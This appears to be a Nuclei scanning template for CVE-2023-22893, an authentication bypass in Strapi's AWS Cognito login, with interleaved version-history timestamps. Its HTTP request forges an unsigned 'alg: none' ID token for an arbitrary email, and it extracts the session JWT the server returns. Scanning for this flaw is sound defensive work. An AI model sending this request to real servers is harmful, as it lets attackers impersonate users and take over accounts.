2024-08-29 12:27:46 +00:00
id : CVE-2023-22893
info :
2024-08-29 13:33:38 +00:00
name : Strapi Versions <=4.5.6 - Authentication Bypass
2024-08-29 12:27:46 +00:00
author : iamnoooob,rootxharsh,pdresearch
severity : high
description : |
Strapi through 4.5.5 does not verify the access or ID tokens issued during the OAuth flow when the AWS Cognito login provider is used for authentication. A remote attacker could forge an ID token that is signed using the 'None' type algorithm to bypass authentication and impersonate any user that use AWS Cognito for authentication.
reference :
- https://www.ghostccamm.com/blog/multi_strapi_vulns
- https://github.com/strapi/strapi/releases
- https://github.com/ARPSyndicate/cvemon
2024-08-29 13:33:38 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-22893
2024-08-29 12:27:46 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2023-22893
cwe-id : CWE-287
epss-score : 0.00337
epss-percentile : 0.71798
cpe : cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*
metadata :
verified : true
max-request : 1
vendor : strapi
product : strapi
fofa-query : app="strapi-Headless-CMS"
tags : cve,cve2023,strapi,authenticated,aws,cognito
variables :
email : "{{email}}"
payload : '{"cognito:username":"{{to_lower(rand_text_alpha(10))}}","email":"{{email}}"}'
http :
- raw :
- |
GET /api/auth/cognito/callback?access_token={{to_lower(rand_text_alpha(8))}}&id_token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.{{base64(payload)}}. HTTP/1.1
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : word
part : body
words :
- '"provider":'
- '"confirmed":'
condition : and
- type : word
part : content_type
words :
- application/json
- type : status
status :
- 200
extractors :
- type : json
part : body
name : token
json :
- ".jwt"
2024-08-29 13:40:34 +00:00
# digest: 4a0a004730450221008e94642f070b81b9b91cb223562b771430bf25969203b6a0de14772d165e7ba90220585f5eb4ecf088a6c57c1fc61190a47ba1712adfd87029eade60432b6e6a3d17:922c64590222798bb761d5b6d8e72950
